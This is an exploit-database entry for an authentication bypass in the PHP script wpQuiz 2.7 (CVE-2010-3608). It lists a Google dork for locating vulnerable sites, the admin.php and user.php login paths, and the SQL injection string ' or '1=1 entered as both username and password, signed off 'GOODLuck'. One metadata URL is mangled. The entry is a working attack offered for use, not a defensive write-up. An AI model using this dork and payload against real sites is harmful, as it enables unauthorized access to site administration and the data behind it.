[] NeoSense

wpQuiz 2.7 - Authentication Bypass

Author: KnocKout
type: webapps
platform: php
port: 
date_added: 2010-09-21 
date_updated: 2010-09-21 
verified: 1 
codes: CVE-2010-3608;OSVDB-68208;OSVDB-68207 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comquiz.zip

Powered by wpQuiz - Auth bypass Vulnerability

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[+] Greatz : DaiMon
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : wpQuiz
~Version : 2.7
~Download : http://webscripts.softpedia.com/script/Quizz/wpQuiz-41098.html
~Vulnerability Style : Auth bypass
~Google Dork : "Powered by wpQuiz" inurl:index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~

http://[Victim]/path/admin.php
                     [or user.php]

for bypass() bySQL

ID : ' or '1=1
PW : ' or '1=1

              GOODLuck ;)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~